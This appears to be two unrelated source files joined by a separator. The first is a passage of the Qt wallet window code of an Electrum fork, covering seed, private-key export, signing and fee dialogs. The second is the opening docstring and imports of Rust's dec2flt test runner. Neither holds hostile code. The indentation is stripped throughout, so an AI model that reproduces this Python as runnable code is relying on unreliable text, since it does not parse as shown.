nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(QLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(lambda: self.init_lightning_dialog(dialog))
grid.addWidget(button, 5, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum LitecoinFinance, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum LitecoinFinance was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except UserFacingException as e:
self.show_error(e)
return
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum LitecoinFinance was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltfn-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum LitecoinFinance was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum LitecoinFinance to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum LitecoinFinance will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
runtests.py | #!/usr/bin/env python2.7
#
# Copyright 2015 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
Testing dec2flt
===============
These are *really* extensive tests. Expect them to run for hours. Due to the
nature of the problem (the input is a string of arbitrary length), exhaustive
testing is not really possible. Instead, there are exhaustive tests for some
classes of inputs for which that is feasible and a bunch of deterministic and
random non-exhaustive tests for covering everything else.
The actual tests (generating decimal strings and feeding them to dec2flt) is
performed by a set of stand-along rust programs. This script compiles, runs,
and supervises them. The programs report the strings they generate and the
floating point numbers they converted those strings to, and this script
checks that the results are correct.
You can run specific tests rather than all of them by giving their names
(without .rs extension) as command line parameters.
Verification
------------
The tricky part is not generating those inputs but verifying the outputs.
Comparing with the result of Python's float() does not cut it because
(and this is apparently undocumented) although Python includes a version of
Martin Gay's code including the decimal-to-float part, it doesn't actually use
it for float() (only for round()) instead relying on the system scanf() which
is not necessarily completely accurate.
Instead, we take the input and compute the true value with bignum arithmetic
(as a fraction, using the ``fractions`` module).
Given an input string and the corresponding float computed via Rust, simply
decode the float into f * 2^k (for integers f, k) and the ULP.
We can now easily compute the error and check if it is within 0.5 ULP as it
should be. Zero and infinites are handled similarly:
- If the approximation is 0.0, the exact value should be *less or equal*
half the smallest denormal float: the smallest denormal floating point
number has an odd mantissa (00...001) and thus half of that is rounded
to 00...00, i.e., zero.
- If the approximation is Inf, the exact value should be *greater or equal*
to the largest finite float + 0.5 ULP: the largest finite float has an odd
mantissa (11...11), so that plus half an ULP is rounded up to the nearest
even number, which overflows.
Implementation details
----------------------
This directory contains a set of single-file Rust programs that perform
tests with a particular class of inputs. Each is compiled and run without
parameters, outputs (f64, f32, decimal) pairs to verify externally, and
in any case either exits gracefully or with a panic.
If a test binary writes *anything at all* to stderr or exits with an
exit code that's not 0, the test fails.
The output on stdout is treated as (f64, f32, decimal) record, encoded thusly:
- First, the bits of the f64 encoded as an ASCII hex string.
- Second, the bits of the f32 encoded as an ASCII hex string.
- Then the corresponding string input, in ASCII
- The record is terminated with a newline.
Incomplete records are an error. Not-a-Number bit patterns are invalid too.
The tests run serially but the validation for a single test is parallelized
with ``multiprocessing``. Each test is launched as a subprocess.
One thread supervises it: Accepts and enqueues records to validate, observe
stderr, and waits for the process to exit. A set of worker processes perform
the validation work for the outputs enqueued there. Another thread listens
for progress updates from the workers.
Known issues
------------
Some errors (e.g., NaN outputs) aren't handled very gracefully.
Also, if there is an exception or the process is interrupted (at least on
Windows) the worker processes are leaked and stick around forever.
They're only a few megabytes each, but still, this script should not be run
if you aren't prepared to manually kill a lot of orphaned processes.
"""
from __future__ import print_function
import sys
import os
import time
import struct
from fractions import Fraction
from collections import namedtuple
from subprocess import Popen, check_call, PIPE
from glob import glob
import multiprocessing
import threading
import ctypes
